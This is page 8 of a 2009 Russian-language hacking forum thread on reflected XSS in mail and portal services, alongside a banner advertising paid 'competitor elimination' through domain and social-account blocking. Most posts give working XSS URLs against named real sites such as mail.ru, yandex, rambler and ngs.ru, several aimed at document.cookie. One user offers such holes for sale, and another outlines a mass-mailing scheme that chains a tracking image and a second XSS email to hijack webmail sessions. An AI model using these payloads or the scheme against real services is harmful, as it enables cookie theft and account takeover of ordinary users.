Форум АНТИЧАТ - Пассивные xss на почтовых серверах

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Пассивные xss на почтовых серверах

Страница 8 из 15

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#71

07.10.2009, 20:37

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Код:

http://story.travel.mail.ru/?mod%3C'%3C%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C=story&city_id=183615

Последний раз редактировалось Ruslan1817; 07.10.2009 в 21:48..

#72

12.10.2009, 18:30

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

Провел на форуме:
2485155

Репутация: 719

Отправить сообщение для satana-fu с помощью ICQ

XSS на юкозe (работает только у авторизованных админов сайта)

Цитата:

http://сайт на юкозе.ru/tmpls/?a=fm;n="><script>alert(document.cookie)</script>;ffilter=video;f=auth?ljcUik

Не почтовый сервер, просто не нашел куда засунуть его

Последний раз редактировалось satana-fu; 12.10.2009 в 18:37..

#73

16.10.2009, 11:15

Gefasto

Новичок

Регистрация: 28.09.2009

Сообщений: 9

Провел на форуме:
391195

Репутация: 13

Отправить сообщение для Gefasto с помощью ICQ

Пассивная xss на ngs.ru

Код:

http://expert.ngs.ru/search/?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&t=1&r=0

Последний раз редактировалось Gefasto; 16.10.2009 в 11:19..

#74

18.10.2009, 23:25

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://travel.mail.ru/news/46607/?%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E&page=1

думал уже все прикрыли =))

#75

19.10.2009, 23:43

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://content.mail.ru/help/&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E
Так же продам пассивки XSS

Последний раз редактировалось Ruslan1817; 20.10.2009 в 00:36..

#76

21.10.2009, 22:16

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Код:

http://www.google.com.ua/imgres?imgurl=http://gogole.com&imgrefurl=IFRAME_HERE&h=254&w=340&sz=15D0%25B8%25D1%2582%25D0%25B1%25D1%2583%25D0%25BB%25D1%258C%25D1%2582%25D0%25B5%25D1%2580%25D1%258C%25D0%25B5%25D1%2580&hl=ru&usg=__UzxB7H_92zpHrCDSG-bR5itVNg4=&ei=Lk7fSvurCI-lsAbN0_GlDg&sa=X&oi=image_result&resnum=4&ct=image&ved=0CAwQ9QEwAw

IFRAME

хм... никогда этим не занимался. To

#77

22.10.2009, 17:07

Irdis

Участник форума

Регистрация: 06.02.2006

Сообщений: 177

Провел на форуме:
1576821

Репутация: 88

Отправить сообщение для Irdis с помощью ICQ

хм... никогда этим не занимался. To

Код:

http://calendar.yandex.ru/event-add?show_date=2009-10-22&view_type=%22%27%3E%3Cscript%3Ealert%28%27Irdis%27%29%3C/script%3E

#78

23.10.2009, 16:51

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

Провел на форуме:
2485155

Репутация: 719

пассивки на рамблер

Цитата:

PHP код:


		
			
http://id-planet.rambler.ru/default/friends/search/?do_friends_search=1&firstname=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Dalert%28%2F%D0%98%D0%BC%D1%8F%2F%29+%2F%3E+&lastname=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Dalert%28%2F%D0%A4%D0%B0%D0%BC%D0%B8%D0%BB%D0%B8%D1%8F%2F%29+%2F%3E+&external_id=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Dalert%28%2F%D0%9B%D0%BE%D0%B3%D0%B8%D0%BD%2F%29+%2F%3E+&service_id=

Работает только у авторизованных (пробелы убрать)

Последний раз редактировалось satana-fu; 23.10.2009 в 16:54..

#79

23.10.2009, 17:40

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://travel.mail.ru/?'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Ecity_from=1&countryid=1934&countryidtxt=& cityid=1500&cityidtxt=&hotelidtxt=&inp_mode=sel&ca t4=on&cat5=on&price=%3Cimg+src%3D%22javascript%3Aa lert%28document.cookie%29%22%3E&p_mode=1&p_type=2& nights1=%3Cimg+src%3D%22javascript%3Aalert%28docum ent.cookie%29%22%3E&nights2=%3Cimg+src%3D%22javasc ript%3Aalert%28document.cookie%29%22%3E&date1_d=1& date1_my=10_2009&date2_d=22&date2_my=11_2009&HB=on &STD=on&comments=%3Cimg+src%3D%22javascript%3Aa ler t%28document.cookie%29%22%3E&mod=custom_order_tour

#80

25.10.2009, 17:00

zpurgenz

Новичок

Регистрация: 24.10.2009

Сообщений: 2

Провел на форуме:
23183

Репутация: 3

Цитата:

Сообщение от Ruslan1817

http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(doc ument.cookie)</script>

По поводу этой штуки работает многоходовка, да и работает ли...?
Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо....
Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке

конечно если разослать миллиону товарищей то возможно эффект будет...

ЗЫ Совсем забыла, XSS работает если в письме есть вложение.

Последний раз редактировалось zpurgenz; 25.10.2009 в 17:07..

Страница 8 из 15

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Сценарии/CMF/СMS	7	04.02.2010 02:55
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход